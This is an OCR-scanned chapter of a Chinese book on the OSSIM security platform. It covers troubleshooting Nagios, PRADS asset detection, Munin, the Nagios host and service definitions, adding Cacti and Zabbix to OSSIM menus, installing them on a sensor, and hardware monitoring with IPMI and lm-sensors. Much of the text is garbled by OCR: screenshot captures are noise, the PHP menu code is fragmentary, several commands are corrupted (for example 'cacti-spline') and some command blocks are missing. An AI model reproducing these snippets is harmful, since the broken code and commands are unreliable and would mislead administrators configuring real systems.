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待 以 上 操作 正确 完成 之 后 ， 在 ASSET 一 Availability 下 就 能 看 到 监控 服务 的 详情 。 


8.6.8 ”Nagios 报错 处 理 


初次 使 用 OSSIM 进行 Nagios 设置 的 读者 ， 会 在 添加 资产 并 开始 监控 时 出 现 Nagios 报错 
问题 ， 例 如 用 户 在 资产 菜单 中 添加 端口 监控 操作 ， 如 图 8-81 所 示 。 


EDITAVAILABILITY MONITORING 


AVAILABILITY MONITORING [SCAN HOST NOW] 


Uncheck Al 


ay Services 
[V] y" msrpc (135/169) [192.168.11.220] 
y netbios-ssn (139/19 [192.168.11.220] 
TF netbios-ssn (445/tep) [192.168.11.220] 
[V] Y risp. 54/1ep) [192.168.11.220] 


[v] y htt (5357/tcp) [192.168.11.220] 
qp msrpc (9152/19) [192.168. 11.220] 
Y msrpc (49153/tep) [192.168.11.220] 

Y msrpc (49154/1cp) [192.168.11.220] 


图 8-81 添加 端口 监控 


8-80 中 所 示 的 三 步 操作 完 之 后 也 没有 报错 , 但 进入 ENVIRONMENT- AVAILABILITY 
就 显示 报错 信息 ， 出 现 “Error: Could not read host and service status information! ”错误 如 何 处 
理 呢 ?主要 看 最 后 一 次 操作 做 了 什么 ， 在 上面 的 背景 中 ， 对 192.168.11.220 这 台 主 机 做 端口 监 
控 的 操作 ， 那 么 肯定 出 在 这 台 主 机 的 配置 文件 上 ， 如 图 8-82 所 示 。 


Ei e E 


DASHBOARDS ANALYSIS REPORTS CONFIGURATION 
AVAILABILITY aaa o 
GROUPS & NETWORKS 
EL wromwo VULNERABILITIES 
PROFILES 
SENSOR: AuaUSMAInOneT WI STATUS GRID | STATUS MAP | SERVICE PROBLEMS | HOST PROBLEMS 
IMENTS | DOWNTIME | PROCESS INFO | PERFORMANCE INFO T SCHEDULING QUEUE 
NETFLOW 
Whoops! TRAFFIC CAPTURE 
Error: Could not read host and service status information! 


DETECTION 


The most common cause of this error message (especially for new users), 15 the fact that Nagios is not actually ronning If Nagios is indeed not running, this is a normal error message. 
1t simply indicates that the CGls could not obtain the current status of hosts and services that are being monitored. If yov've just installed things, make sure you read the documentation 


on starting Nagios 
Some other things you should check in order to resolve this error include: 


1. Check the Nagios log file for messages relating to startup or status data errors. 
2. Always verify configuration options using the -v command-line option before starting or restarting Nagios! 


Make sure you read the documentation on installing, coniiguring and running Nagios thoroughly before continving. If all eise fails, ry sending a message to one of the mailing lists. 
Morc information can be found at htip, /wivw nagios orz. 


8-82 Nagios 故障 
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下 面 我 们 到 OSSIM Server 控制 台 上 ， 尝 试 重启 Nagios 服务 ， 观 察 会 有 什么 情况 发 生 : 


Processing object config file '/etc/nagios3/conf.d/ossim-configs/hosts/192.168.11.105.cfg'... 

Processing object config file '/etc/nagios3/conf.d/ossim-configs/hosts/192.168.11.1.cfg'. 

Processing object config file '/etc/nagios3/conf.d/ossim-configs/hosts/192.168.11.89.cfg' 

Processing object config file '/etc/nagios3/conf.d/ossim-configs/hosts/192.168.11.40.cfg'... 

Processing object config file '/etc/nagios3/conf.d/ossim-configs/hosts/192.168.11.220.cfg'... 

Warning: Duplicate definition found for host 'localhost' (config file '/etc/nagios3/conf.d/ossim-configs/hosts/192.1 

68.11.220.cfg', starting on line 1) 

Error: Could not add object property in file '/etc/nagios3/conf.d/ossim-configs/hosts/192.168.11.220.cfg' on line 2. 
Error processing object config files! 


**«» One or more problems was encountered while processing the config files... 


Check your configuration file(s) to ensure that they contain valid 
directives and data defintions. If you are upgrading from a previous 
version of Nagios, you should be aware that some variables/definitions 
may have been removed or modified in this version. Make sure to read 
the HTML documentation regarding the config files, as well as the 
'Whats New' section to find out what has changed. 


errors in config! ... failed! 
failed! 
VirtualUSMAllInOne: /usr/share/ossim/www/homes |l 


这 时 ， 我 们 可 以 确定 问题 出 在 192.168.11.220.cfg 配置 文件 上 ， 处 理 方法 是 直接 修改 该 文 
件 ， 或 者 将 其 删除 重新 配置 ， 并 且 在 Asset 中 删除 该 主机 的 记录 。 这 样 在 Nagios 中 遇 到 的 故 
障 即 可 消除 ， 如 图 8-83 所 示 。 


Assets — Asset Details 
localhost 
192.168.11.220 

localhost 


+ MORE DETAILS. — [| 
Snapshot 
8 0 
Ere Cw |] wm .— 
图 8-83 ”删除 主机 记录 


经 过 单 击 上 面 的 删除 按钮 ， 系 统 在 后 台 会 删除 /etc/nagios3/conf.d/ossim-configs/ 下 的 hosts 
及 host-services 配置 文件 。 注意 : 每 次 变更 时 ， 立 即 观察 结果 ， 切 勿 多 次 修改 积攒 到 一 起 ， 再 
进行 观察 。 


eo Are you sure to delete this element? 


8.6.9 被 动 资产 检测 PRADS 

OSSIM 下 检测 资产 方式 有 主动 检测 和 被 动 检 测 ， 主 动 检测 是 利用 Nmap 扫描 进行 扫描 ， 
被 动 检测 就 包含 pOf . PADS ( PADS , Passive Asset Detection System 
http://passive.sourceforge.net). prads 等 检测 方式 ， 这 里 主要 采用 了 p0ft+PRADS 服务 检查 资产 
情况 。Prads (Passive Real-time Asset Detection System) 是 被 动 实时 资产 检测 系统 的 简称 ， 它 
采用 数字 指纹 识别 服务 ， 可 用 于 网 络 资产 和 实时 监测 的 变化 。 

Prads 程序 可 以 从 每 个 数据 包 中 获得 有 用 信息 ， 通 过 查找 资产 的 MAC、TCP、UPD 以 及 
操作 系统 指纹 和 应 用 相 匹配 , 获得 统一 状态 表 (匹配 文件 参见 /etc/prads/tcp-rst.fp tcp-fin.pf 等 )， 
并 输出 各 种 日 志文 件 。 在 命令 行 下 输入 prads， 然 后 开始 噢 探 ， 若 想 终止 时 可 以 输入 ^C 命令 。 
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注意 :“.pf” 文 件 为 指纹 库 ， 例 如 pOf.pf。 


8.6.10 ”性 能 监控 利器 Munin 

监控 Linux 主机 的 性 能 需要 大 量 的 数据 来 建立 相互 关系 而 得 出 结论 。 下 面 给 大 家 介绍 
OSSIM 4.8 中 另 一 个 集成 工具 Munin， 它 可 以 通过 客户 端 一 服务 器 架构 ， 收 集 数据 并 将 其 图 形 
化 。Munin 允许 跟踪 主机 的 运行 记录 ， 就 是 所 谓 的 “节点 ”， 然 后 将 它们 发 送 到 中 心服 务 器 ， 
之 后 你 就 能 以 图 像 形式 展示 它们 。 如 图 8-84 所 示 ， 可 以 看 到 一 个 用 Munin 图 形 界面 显示 磁盘 
VO 信息 的 示例 。 


^ Overview ;; localhost :: localhost 
MUNIN (ost to munin network post processes system 


disk 
Disk 10s per device - by day Disk 10s per device - by week 
Qon E 
E $ am 
i i 
Š z -一 at 
H = as | 
è 
ml 
ELI a 
B 4m /ln LI ma; 
Disk latency per device - by day 
amt E 
§ um e 
È iem 
È um 5 
i um , 
Ë om H 
Q em e » 
t m H - 
i m HET 
2r Ti [rr S » a a w m» o 
" - - or "i^ a - 
Ba - - lue pe | ww em du Ei o Sus 
M wise Fri Fa 7 le 00 0 2 Van date: Fri Fs 1 09 25 02 2014 


8-84 ”显示 磁盘 IO 


Munin 安装 在 /etc/munin 目录 下 ， 我 们 先 了 解 一 下 它 的 配置 文件 munin.conf. 

在 OSSIM 4 USM 中 打开 /etc/munin/munin.conf 文件 , 其 中 dbdir 设置 决定 munin 把 收集 到 
的 RRD 格式 统计 数据 放 在 /var/lib/munin 目录 下 。 

htmldir 设置 控制 munin 输出 数据 的 位 置 ， 在 /etc/apache2/conf.d/munin 配置 文件 中 定义 了 
虚拟 目录 munin， 也 就 是 说 我 们 通过 https://ip/munin 就 能 用 图 形 化 显示 监控 节点 状态 。 

Logdir 和 rundir 设置 控制 munin 的 日 志文 件 和 PID 文件 放置 位 置 。 

最 后 ， 我 们 必须 在 munin.conf 文件 中 定义 所 有 将 向 服务 器 发 送 报告 的 节点 主机 ， 命 令 为 : 


[hostname.example.com] address 10.0.0.1 use node name yes 
[hostname2.example.com] address 10.0.0.2 use node name yes 


括号 中 是 每 个 节点 的 名 字 ， 后 面 紧 跟 它 的 IP Ji, use node name 命令 控制 munin 命名 
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节点 的 方式 ， 如 果 后 面 跟 的 参数 为 “yes”， 表 示 用 括号 中 的 值 来 命名 ， 如 果 是 “no” 则 将 执 
行 一 个 DNS 查询 。 每 个 munin 节点 都 采用 TCP 4949 端口 与 munin 服务 器 通信 ， 所 以 你 必须 
确保 这 个 端口 在 主机 防火 墙 上 允许 通过 。 

与 Nagios 类 似 , Munin 也 是 采用 插件 的 架构 方式 来 定义 监控 内 容 。 例 如 , 有 专门 监控 CPU 
的 插件 ， 还 有 监控 负载 、 内 存 和 其 他 内 容 的 各 种 插件 。Munin 的 所 有 插件 清单 可 以 在 
/etc/munin/plugins 目录 下 找到 ,它们 以 链接 到 插件 的 sym-links 形式 显示 。 添 加 一 个 插件 到 munin 
就 是 将 插件 文件 的 链接 写 入 到 /etc/munin/plugins 目录 下 。 我 们 通过 运行 munin-node init 脚本 来 
启动 munin 服务 器 和 节点 。 


#/etc/init.d/munin-node start 
#/etc/init.d/munin-node stop 


这 样 就 能 开始 munin 监控 并 收集 需要 的 数据 ，munin 周期 性 地 查看 每 个 节点 的 数据 ， 然 后 
将 其 上 传 到 munin 服务 器 ， 接 着 用 户 通过 munin 的 Web 服务 来 查看 结果 。OSSIM 系统 中 使 用 
munin 命令 如 下 : 


#perl /usr/share/munin/munin-graph --cron 


Nagios 配置 文件 


如 果 打 算 手 动 安装 Nagios， 首 先 需 要 解决 Nagios 的 依赖 关系 问题 ， 尽 管 它 只 有 很 少 的 依 
赖 关系 ， 而 且 一 部 分 在 Linux 系统 中 已 安装 ，Web 前 端 要 求 配 有 支持 CGI 的 Web 服务 器 ， 比 
如 Apache. 如果 需 要 让 Nagios 显示 图 片 ， 则 需要 安装 libpng, libjpeg 以 及 GD 库 。 但 在 OSSIM 
系统 里 ， 这 一 切 不 需要 用 户 完成 ， 只 需要 将 OSSIM 安装 好 之 后 ， 这 一 切 将 自动 完成 ， 但 对 于 
关键 文件 位 置 需要 了 解 ， 如 表 8-10 所 示 。 


表 8-10 Ossim 中 Nagios 文件 位 置 
/'etc/nagios3/nagios.cfg 


/usr/share/nagios3/htdocs/. 
/'usr/lib/nagios/plugins/ 


/usr/sbin/nagios3 


/ usr/lib/cgi-bin/nagios3/ 


/ var/run/nagios3/ 
/ var/log/nagios3/archives/ 
当 你 希望 在 OSSIM 中 调整 Nagios 时 ， 必 须 了 解 Nagios 配置 ，Nagios 会 在 指定 时 间 段 调 
用 插件 对 主机 进行 监测 , 对 于 主机 对 象 的 定义 、 服务 的 定义 、 命令 及 联系 人 的 配置 都 是 必须 的 ， 


505 


开源 安全 运 维 平台 一 一 OSSIM 最 佳 实践 


下 面 我 们 加 以 说 明 。 

Nagios 监控 系统 中 主 配置 文件 是 nagios.cfg， 其 次 就 是 对 象 配 置 文件 。Nagios.cfg 会 被 所 
有 配置 文件 引用 ， 主 要 包含 影响 Nagios 守护 程序 运行 的 一 些 指令 (包括 全 局 配置 、 日 志 路 径 、 
写 入 方式 、 对 象 配置 文件 名 称 等 )， 在 对 象 配置 文件 中 包含 了 大 量 对 象 定义 。 注 意 : 读者 不 要 
随意 修改 nagios.cfg 绝对 路 径 以 及 更 改 nagios.cfg 文件 名 称 ， 如 表 8-11 所 示 。 


表 8-11 Nagios 对 象 定义 简介 


对 应 配置 文件 


command checkcommands.cfg 


timeperiod 


host 


hostgroup 


Service 
servicegroups.cfg 
contacts.cfg 
contactgroups.cfg 


dependencies.cfg 


Ossim 平台 下 Nagios 主 配置 文件 路 径 为 /etc/nagios3/nagios.cfg， 在 安装 OSSIM 过 程 中 
Nagios 已 经 配置 完毕 ， 剩 下 的 就 需要 用 户 将 自己 的 资源 加 入 其 中 。 如 果 读者 独立 安装 配置 过 
Nagios， 便 会 体会 到 其 中 的 艰辛 ， 但 在 OSSIM 中 实现 同样 的 监控 目的 ， 操 作 过 程 却 非常 简单 ， 
我 们 需要 关注 的 配置 文件 集中 在 /etc/nagios3/conf.d/ossim-configs/， 该 目录 下 包含 hosts. 
hostgroups、host-service 及 hostgroup-services 配置 文件 。 


8.7.1 主机 定义 
下 面 我 们 观察 某 个 主机 定义 的 例子 ， 前 提 是 我 们 已 经 在 OSSIM 中 配置 添加 完成 资源 并 启 
用 资源 监控 ， 我 们 打开 /etc/nagios3/conf.d/ossim-configs/hosts/192.168.91.128.cfg 文件 ， 主 机 定 
义 文件 使 用 了 类 似 C 语言 函数 的 通用 语法 , 定义 由 括号 人 } 所 包含 的 指令 组 成 , 如 图 8-85 所 示 。 
define hostt 

host name Hos 92-168-91-128 

alias Host-1* J-91-128 

address 192.1 JL. 12 


use generic-host 
H 


图 8-85 主机 定义 


€ Host name: 定义 主机 名 。 

Alias: 定义 主机 别名 。 

€ Address: 指定 IP 地 址 ， 如 果 你 使 用 主机 名 ， 则 需要 考虑 DNS 系统 是 否 完备 ， 否 则 
请 使 用 IP 地 址 。 
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€ Use generic-host: Use 表示 引用 ， 也 就 是 将 主机 generic-host 的 所 有 属性 引用 到 
linux-server 中 来 ， 在 nagios 配置 中 ， 很 多 情况 下 会 用 到 引用 。 


8.7.2 ”服务 定义 


这 里 我 们 打开 /etc/nagios3/conf.d/ossim-configs/host-services/Host-192-168-91-128FTP.cfg， 
定义 如 图 8-86 所 示 。 


define seruicet 


notification interval 120 
Y 


图 8-86 ”服务 定义 


与 主机 定义 相 比 ， 在 服务 描述 中 没有 别名 ， 而 quare service description 指令 ， 试 想 一 
当 A 服务 器 和 B 服务 器 都 需要 同时 了 FTP 服务 时 ， -条 语句 就 很 有 效 ， 服 务 定义 就 能 
直接 复制 使 用 。 
Check_command 命令 用 于 指定 服务 并 进行 检测 ， 它 是 由 插件 提供 的 一 个 子 命令 ， 全 部 集 
合 位 于 /usr/lib/nagios/plugins/ 目 录 中 。 
Notification interval 120 代表 在 主机 出 现 异常 后 ， 故 障 一 直 没 有 解决 ，Nagios 再 次 对 使 用 
者 发 出 通知 的 时 间 ， 单 位 是 分 钟 。 
这 台 主 机 有 多 少 服务 需要 监控 ， 就 会 有 多 少 个 cfg 配置 文件 ， 每 个 配置 文件 格式 都 相同 ， 
所 不 同 的 是 主机 名 和 检测 命令 ， 如 图 8-87 所 示 。 
lienvault:/etc/nagios3/conf .d/ossim-conf i ost-Seruices# ls 


192-168-91-128FTP .cfg Host-1 168-91-128GENERIC TCP 445.cfg 
192-168-91-128GENERIC TCP 135.cfg MHost-192-168-91-128HTTP .cfg 


0st-192-168-91-128GENERIC TCP 139.cfg s 9 BSMTP .cfg 
Host-192-168-91-128GENERIC TCP 443.cfg ENERIC TCP 53.cfg 
lienuault:/etc/nagios3/conf .d/ossim-con t-seruicestt 


图 8-87 主机 各 服务 定义 文件 
注意 : 当 调 整 Nagios 配置 之 后 ， 如 何 确定 正确 与 否 ? 可 以 输入 以 下 命令 进行 检验 : 
#nagios3 -v /etc/nagios3/nagios.cfg 


该 脚本 会 自动 生成 检测 报告 。 


第 三 方 监控 工具 集成 


多 数 企业 已 有 一 套 或 多 套 监控 系统 ， 已 经 形成 了 一 套 固 有 的 监控 体系 ， 这 时 候 如何 跟 
OSSIM 系统 融合 在 一 起 呢 ? 这 种 情况 我 们 需要 在 OSSIM 的 菜单 做 文章 , 对 于 不 同 版 本 的 系统 
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方法 不 同 。 注 意 : 需要 读者 具有 一 定 PHP 编程 基础 才能 完成 本 节 实 验 。 
8.8.1 OSSIM 2.3 的 集成 

下 面 以 OSSIM 2.3 系统 为 例 , 讲解 怎样 将 Cacti 集成 到 OSSIM 中 , 这 时 我 们 需要 修改 PHP 
代码 , 首先 需要 安装 Cacti 并 配置 好 , 然后 我 们 需要 编辑 /usr/share/ossim/www/menu_options.php 
文件 ， 大 约 在 1044 行 的 位 置 加 入 如 下 代码 ， 如 图 8-88 所 示 。 系 统 在 设计 时 ,为 了 便于 扩展 菜 
单 采用 了 PHP 数组 菜单 ， 具 体 如 下 : 


$menu["Monitors"][] = array( 


"name" => gettext("Cacti"), 
d" => "Cacti", 
"url" => "http://192.168.150.100/cact 
); 
$menu["Monitors"][] = array( 


"name" => gettext ("Zabbix"), 
"id" => "Zabbix", 
"url" => "http://192.168.150.100/zabbix", 


> "main", 
nag iosz index. ph or-" . $sensor nagios["host"], 
“ javascript :top.topmenu new wind(’ http://ossim.net/dokuwiki/doku. php? id-user. 
manual :monitors :avai labi Hity" ," Help); 
ailability"][] = array( 
» gettext("Reporting") , 


r=" msor_mag ios[ 
javascript:top.topmenu .new_wind(’ http:// m.net^dokuwiki/doku. php? id-user. 
manual monitors availability’ ,"Help');" 
"Monitorsfvailability")) € $monitors = 1 


ext("Cacti") , 


//192.168. 158. 188/cact i", 


192.168.158. 188/zabbix", 


Wweilability"lL] = array( 
tC" Monitoring") , 
ilability' 
'main" 


r nagios[" L 
http://ossim.net/dokuwiki/doku .php? id-user. 


EA 

Shmenut "Availability"][] = arrayc 
gettext ("Reporting") , 
eport ing", 


图 8-88 配置 菜单 
按照 以 上 脚本 修改 之 后 ， 在 系统 菜单 中 集成 Cacti 和 Zabbix 的 效果 如 图 8-89 所 示 。 
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8-89 ”添加 菜单 成 功 


8.8.2 OSSIM 4.1 的 集成 


对 于 OSSIM 4.1 系统 而 言 ， 修 改 菜单 时 有 些 不 同 ， 举 例 来 说 ， 修 改 以 下 PHP 代码 ， 首 先 


还 是 编辑 /usr/share/ossim/www/menu_options.php 菜单 配置 文件 ， 大 约 在 1316 行 的 位 置 加 入 如 
图 8-90 所 示 框 中 的 代码 。 
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单 的 位 置 也 不 是 唯一 的 ， 这 里 我 们 就 以 加 


效果 如 图 8-90 右 下 方 所 示 。 注 意 : 本 次 加 入 3 


载 到 Situational Awareness 一 Availability 下 面 为 例 讲 解 。 修 改 的 方法 和 OSSIM 2.3 系统 类 似 ， 
但 加 入 代码 和 位 置 都 有 了 一 定 区 别 。 


图 8-90 在 OSSM 4.1 中 添加 菜单 


8.8.3 OSSIM 4.6 的 集成 

从 OSSIM 4.6 开始 ， 在 新 的 框架 中 系 
/usr/share/ossim/include/classes/menu.inc。 

下 面 举 个 例子 ， 我 们 在 仪表 盘 菜 单 加 入 一 行内 容 。 

首先 在 Dasboards 添加 如 下 代码 ， 位 置 在 485 行 ， 如 图 8-91 所 示 。 


单调 用 发 生 了 改变 ， 它 的 核心 文件 位 于 : 


Zekolli 
一 一 -一 Dashboards 一 -一 一 一 一 一 一 
———————— e" 


图 8-91 OSSIM 4.6 中 添加 菜单 


然后 在 Deployment status 和 Risk Maps 之 间 加 入 如 图 8-92 左 侧 框 中 的 代码 ， 保 存 后 再 刷 
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新 页 面 ， 会 发 现在 DASHBOARDS 菜单 下 多 出 了 一 个 NEWMENU 菜单 。 


图 8-92 OSSIM 4.6 中 添加 菜单 


8.8.4 ”Sensor 安装 Cacti 

由 于 在 OSSIM 5.1.1 版 本 中 取消 了 Ntop 流量 监控 分 析 软 件 ， 我 们 在 OSSIM 集成 Cacti 和 
Zabbix 流量 监控 工具 ， 那 么 在 分 布 式 环境 中 ,将 其 装 在 OSSIM Server 端 还 是 Sensor 端 呢 ? 为 
了 减轻 Server 端 负载 压力 ， 安 装 在 Sensor 端 较 为 合适 , 配合 OSSIM 自 带 的 Nagios， 可 以 更 好 
地 对 网 络 流量 和 应 用 进行 有 效 监控 。 在 这 两 节 中 分 别 为 大 家 介绍 如 何在 Sensor 端 安装 这 两 款 
LA. 

第 2.3.9 节 讲 过 OSSIM USM 和 Sensor 安装 组 件 的 对 比 , 本 节选 择 在 Sensor. 上 安装 Cacti, 
需 将 Apache. MySQL 、PHP 组 件 安装 完整 。 有 具体 操作 步骤 如 下 : 

(1) 安装 Apache 

#apt-get update 

#apt-get install apache2 

(2) 安装 MySQL 

#apt-get install mysql-server 


"n 安装 过 程 中 会 出 现 输入 root 密码 界面 ， 代 表 输 入 MySQL 管理 员 密 码 。 
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(3) 安装 PHP5 


(4) 安装 php5 组 件 ， 让 PHP 支持 MySQL 


除了 php5-mysql 之 外 还 包括 以 下 组 件 ， 用 同样 方法 安装 即 可 : 

php5-gd、 libjpeg8-dev , php5-imap、 php5-ldap、 php5-snmp. php5-cgi . php5-adodb、 php5-odbc . 
php*-pear. php*-xml, php5-xmlrpc. php5-mcerypt. php5-mhash, libmcrypt*. libphp-adodb C% 
装 时 会 提示 include 路 径 被 修改 )、libmcryptdev、php-fpdf。 

另外 ， 将 PHP 配置 文件 链接 到 /etc/ 目 录 下 : 


(5) 修改 时 区 
为 了 解决 date.timezone 的 设置 问题 ， 根 据 它 的 提示 来 看 ， 只 需要 找到 php.ini 文件 ， 然 后 
给 它 赋值 即 可 。 如 : 


或 者 是 如 下 的 形式 : 


重启 生效 。 


(6) 测试 SNMP 
测试 SNMP 操作 如 下 : 


修改 配置 允许 其 他 主机 访问 。 
Debian 默认 只 在 回环 地 址 上 侦 听 。 修 改 非 本 地 访问 则 需要 修改 /etc/defaulVsnmpd 文件 ， 
确保 以 下 配置 为 : 


可 将 配置 文件 里 面 IP 地 址 修改 为 被 监控 的 服务 器 IP. GROB. 


(7) 安装 Cacti 
经 过 以 上 准备 工作 之 后 下 面 正式 安装 Cacti。 
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#apt-get install cacti 


在 Web Server 类 型 中 选择 Apache2 ， 在 出 现 的 “Configure database for cacti with 
dbconfig-common” 提 示 时 选择 “Yes” 之 后 ， 输 入 你 刚才 安装 MySQL 数据 库 的 管理 员 密 码 ， 
接着 提问 cacti 资料 库 的 密码 ， 直 接 按 回 车 ， 系 统 会 随机 产生 一 个 密码 。 当 然 也 可 以 自己 指定 
密码 。 接 着 系统 会 将 配置 写 入 到 /etc/dbconfig-common/cacti.conf 配置 文件 中 ， 创 建新 版 配置 文 
fF/etc/cacti/debian.php 〈 这 就 是 Cacti 使 用 数据 库 的 配置 文件 )、 建 库 名 称 为 cacti、 创 建新 版 
letc/cacti/apache.conf 配置 文件 。 

查看 Cacti 的 版 本 可 以 采用 命令 “apt-cache policy cacti”。 


(8) 安装 spine 
spine 是 一 个 基于 C 语言 的 ， 非 常 快速 的 轮 询 引 擎 。 目 的 是 提高 Cacti 的 获取 数据 的 性 能 ， 
操作 如 下 : 


#apt-get install cacti-spline 


(9) 计划 任务 
系统 在 /etc/cron.d/cacti 自动 加 载 了 计划 任务 : 
*/5 * * * * www-data php /usr/share/cacti/site/poller.php »/dev/null 
2»/var/log/cacti/poller-error.log 
接 下 来 即 可 通过 Web 访问 http:/ip/cacti， 按 照 提 示 操 作 即 可 。 安 装 完成 后 首次 登录 ， 默 
认 账 户 和 密码 都 为 admin, 请 自行 修改 密码 和 相关 用 户 权 限 。 由 于 篇 幅 限 制 这 里 就 不 再 详细 解 
释 如 何在 Web 界面 中 设置 Cacti， 相 关内 容 大 家 可 以 到 作者 博客 上 查阅 。 


8.8.5 安装 Zabbix 
如 果 你 成 功 地 在 Sensor 中 安装 完 Cacti， 方 法 类 似 ， 步 又 如 下 : 


(1) 准备 工作 ， 首 先 要 确保 8.8.4 节 中 第 1~6 步 正确 设置 ， 接 着 按 以 下 命令 操作 : 

#apt-get install fping libiksemel3 

#apt-get install zabbix-server-mysql 

#apt-get install zabbix-frontend-php 

根据 提示 ， 选 择 MySQL 数据 库 、 输 入 管理 密码 。 在 安装 过 程 中 ， 由 于 zabbix 需要 安装 
和 配置 数据 库 ， 因 此 会 要 求 你 使 用 dbconfig-common 来 为 zabbix-server-mysql 配置 数据 库 ， 
回答 是 。 然 后 输入 数据 库 管 理 员 (DBA) 的 密码 ， 再 输入 zabbix-server-mysql 所 用 数据 库 的 密 
码 。 如 果 留 空 的 话 ， 则 是 一 个 随机 生成 的 密码 ， 重 复 输 入 一 次 后 成 功 安装 Zabbix。 


(2) 修改 配置 
修改 php.ini 配置 参数 : 
#vi /etc/php.ini 
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post max size =16M 

max execution time =300 

max input time -300 

(3) Zabbix 配置 

在 浏览 器 上 输入 http://ip/zabbix/ 即 可 打开 Web 界面 ,注意 首次 登录 系统 用 户 名 采用 admin, 
密码 为 zabbix。 接 下 来 需要 安装 Agent，Zabbix 需要 在 被 监控 的 主机 上 安装 Agent， 在 Zabbix 
官网 上 下 载 相应 平台 的 Agent 包 到 各 个 被 监控 端 。 由 于 篇 幅 限 制 ，Web 设置 和 Agent 的 安装 不 
再 详细 叙述 ， 具 体 实现 大 家 可 以 到 作者 的 51CTO 博客 继续 学 习 。 


硬件 监控 


掌握 服务 器 CPU、 内 存 、 磁盘 温度 对 于 系统 运 维和 人 员 非 常 重要 , 在 Windows 下 有 Everest. 
和 鲁 大 师 等 软件 可 以 显示 机 器 内 部 的 温度 ， 在 一 些 HP. IBM 等 服务 器 中 也 会 带 一 些 工 具 以 查询 
硬件 设备 的 温度 。 下 面 教 大 家 几 款 开源 工具 用 于 收集 硬件 温度 。 注意: 本 实验 在 虚拟 机 中 进行 ， 
因 找 不 到 传感器 所 以 无 效 。 


8.9.1 IPMI 
OSSIM 4.4 以 后 的 版 本 提供 了 IPMI 功能 ,IPMI 是 智能 型 平台 管理 接口 (Intelligent Platform 
Management Interface) 的 缩写 ， 是 管理 基于 Intel 结构 的 企业 系统 中 所 使 用 的 外 围 设备 采用 的 
-种 工业 标准 。 用 户 可 以 利用 IPMI 监视 服务 器 的 物理 健康 特征 ， 如 温度 、 电 压 、 风 扇 工 作 状 
态 、 电 源 状 态 等 。 目 前 IBM、HP 及 DELL 等 大 厂家 主流 服务 器 都 支持 它 。 它 工作 时 需要 和 一 
个 专用 芯片 结合 在 一 起 ， 叫 做 BMC 芯片 ， 它 最 大 特点 是 不 依赖 于 服务 器 的 处 理 器 、BIOS 或 
操作 系统 工作 。 它 是 一 个 单独 在 系统 内 运行 的 、 无 代理 管理 子 系统 ， 只 要 有 BMC 与 IPMI E] 
件 就 可 以 开始 工作 。 


如 果 读者 在 虚拟 机 上 或 其 他 兼容 机 上 安装 了 OSSIM, 那么 IPMI 服务 会 因 缺 少 硬 件 而 启动 
| 失败 ， 但 不 影响 使 用 。 


这 样 做 的 好 处 在 于 操作 系统 未 加 载 的 情况 下 仍然 可 以 进行 开关 机 等 底层 操作 ，OSSIM 中 
提供 了 IPMI 软件 ， 是 为 了 支持 BMC 芯片 ， 所 以 带 有 BMC 功能 的 芯片 更 适合 远程 机 房 的 管 
理 ， 这 样 可 收集 服务 器 风扇 转速 、CPU 温度 等 硬件 信息 。 

所 以 要 想 IPMI 系统 顺利 工作 ， 在 服务 器 上 要 有 支持 BMC 芯片 的 板 卡 ， 操 作 系统 有 软件 

( 指 ipmitool) 支持 ， 以 Dell R710 为 例 : 


CD 启动 服务 器 , 使 用 Ctrlte 进入 ipmi server management configuration, 如 图 8-93 所 示 。 
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iDRACó Confiquration Utility 
Copyright 2809 Dell Inc. AII Rights Reserved 1.33 


1pRACS Firmuare Revision 
Primary Backplane Firmware Revision 


ipRac6 Lan 


LED Configurat: 
LAN User Configur. 
Reset Ta Derault 
System Event Log 


[IEIIINIZITEIEISINENEZIIOHTCNIEINTINENKIONUNTIONNNNALISUMN 
图 8-93 ”启用 IPMI Over LAN 


(2) 设置 I PMI Over LAN 为 On. 
(3) 进入 IPMI Parameters， 设 置 服务 器 ip/ 子 网 掩 码 (也 可 以 进去 系统 通过 Ipmitool 管理 
软件 设置 )， 如 图 8-94 所 示 。 
iDRACE Configur 


Copyright 2809 Dell Inc. A 


mary Backplane Firmware Revision 


ITPwn Settings 


Default Gateway 
DHS Servers from DHCP - 
DHS Server 1 --- 

DNS Server 2 


zDown Arrau ro Select T SERERE n To change LESE ro exit Ten)| 
图 8-94 设置 IP 


(4) 进入 LAN User Confuguration, 设置 用 户 名 密码 (同样 也 可 以 进入 系统 , 通过 ipmitool 

管理 软件 设置 )。 

2. 操作 系统 提供 相应 的 IPMI 驱动 ( OS ) 

通过 操作 系统 监控 服务 器 自身 的 ipmi 信息 时 ， 需 要 系统 内 核 提 供 相 应 的 支持 ，OSSIM 
系统 通过 内 核对 OpenIPMI (ipmi 驱动 ) 的 支持 来 提供 对 ipmi 的 系统 接口 。 在 使 用 驱动 之 前 ， 
请 先 启动 该 服务 : 

#service ipmi start 

或 者 启动 模块 : 


modprobe ipmi msghandler 
modprobe ipmi devintf 
modprobe ipmi si 
modprobe ipmi poweroff 
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所 有 服务 设置 完毕 后 ， 你 就 可 以 在 Web 界面 下 Configuration 一 Deployment 一 Components 
一 Remote interfaces 进行 远程 管理 。 


8.9.2 Im-sensors 

lm-sensors 是 一 款 Linux 的 硬件 监控 软件 ， 可 以 帮助 我 们 监控 主板 、CPU 的 工作 电压 ， 风 
扇 转 速 、 温 度 等 数据 。 这 些 数 据 我 们 通常 在 主板 的 BIOS 中 也 可 以 看 到 。 我 们 可 以 在 机 器 运 
行 的 时 候 ， 通 过 Im-sensors 随时 监测 CPU 的 温度 变化 ， 以 保护 CPU， 防 止 其 过 热 而 烧 掉 。 它 
的 下 载 地 址 为 http://www.Im-sensors.org/wikiDownload， 目 前 最 新 版 本 3.3.5。 

在 OSSIM 系统 中 安装 方法 如 下 : 


一 般 来 说 ， 温 度 在 70 度 以 下 都 正常 。 
如 果 你 的 OSSIM Server 安装 了 了 GNOME 桌面 管理 器 , 那么 可 以 通过 以 下 方式 获得 图 形 化 


界面 。 
( apt-get install xsensors sensors-epplet ————— 


8.9.3 hddtemp 
通过 hddtemp 可 以 获取 硬盘 的 温度 。 安 装 命令 如 下 : 


比如 ， 服 务 器 磁盘 设备 名 为 /dev/sda， 要 获取 它 的 温度 ， 操 作 命令 如 下 : 


HELMA SMART (自我 监测 、 分 析 及 报告 技术 ) 。 


516 


第 8 章 OSSIM 流量 分 析 与 监控 


8.10 J4 


本 章 详细 分 析 了 NetFlow 采集 业务 流量 的 原理 和 收集 方法 ,列举 了 NetFlow 在 蠕虫 病毒 检 
